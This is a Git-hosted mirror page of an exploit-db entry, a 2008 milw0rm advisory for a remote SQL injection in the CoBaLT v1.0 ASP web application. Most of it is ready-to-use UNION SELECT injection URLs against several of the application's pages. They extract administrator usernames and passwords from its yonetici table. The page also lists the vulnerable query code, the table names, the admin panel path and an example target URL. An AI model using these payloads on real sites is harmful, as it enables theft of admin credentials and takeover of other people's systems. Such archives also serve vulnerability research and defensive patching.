bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/asp/webapps/5373.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

55 lines
1.6 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
CoBaLT v1.0 Remote SQL İnjection Vulnerabiltiy
Discovered : U238
Mail : setuid.noexec0x1@hotmail.com
WebPage : http://ugur238.org (The End)
Script: http://www.aspindir.com/indir.asp?ID=5414
Script (Alternativ) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
Exploit:
http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+from+yonetici+where+id=2
----
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yonetici
----
http://localhost:2222/lab/cobaltv.1/admin/urun_listele.asp?id=1+union+select+kadi,sifre,kadi,sifre,sifre+from+yonetici
Admin Panel : localhost/path/admin
Other Table : bayi - sepet - siparis - siparis_urun - urun - urun_grup - yonetici
Dork : Sevmem bole seylerı , abi anlamıorum ne bos adamlarsınız :(
Error Code:
id=Request.QueryString("id")
SQL="select * from sepet where id="&"id"
Example Site : http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici
_-_-_-_-_- NURCİHAN _-_-_-_-_- BU SEVDA BİTMEZ _-_-_-_-_- 4 YIL OLDU Amk
Greatz To : The_BekiR _-_ ka0x _-_ Nettoxic _-_ ZeberuS _-_ Str0ke
# milw0rm.com [2008-04-05]
Reference in a new issue View git blame Copy permalink